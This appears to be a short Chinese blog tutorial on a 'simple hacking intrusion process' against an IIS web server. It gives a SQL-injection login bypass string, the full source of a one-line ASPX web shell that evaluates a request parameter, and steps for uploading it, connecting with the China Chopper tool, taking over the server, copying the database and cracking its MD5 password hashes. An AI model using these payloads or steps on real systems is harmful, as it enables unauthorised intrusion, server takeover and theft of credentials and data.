黑客入侵流程"/>
简单的黑客入侵流程
在windows上部署一个IIS web服务器
注意将程疗池使用net 4.0并开启net服务(可能需要手动打开)
web扫描
御剑工具,输入扫描的域名即可出来后台网址
网站的后台绕过
在用户栏输入’or 1=1 or’即可直接不用密码登陆进入后台
上传木马程序
1、新建文本文档,将文件后缀修改为 aspx,书写内容如下:
‹%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
2、上传之前创建的aspx一句话木马文件
中国菜单
接着上文
1、设法获得上传文件在网站目录中的文件名称和路径。
2、利用中国菜刀工具连接一句话木马(密码为 pass)。
3、获得目标服务器的操作权限并拿到数据库文件。
4.复制password 内容,去MD5解密
更多推荐
简单的黑客入侵流程
发布评论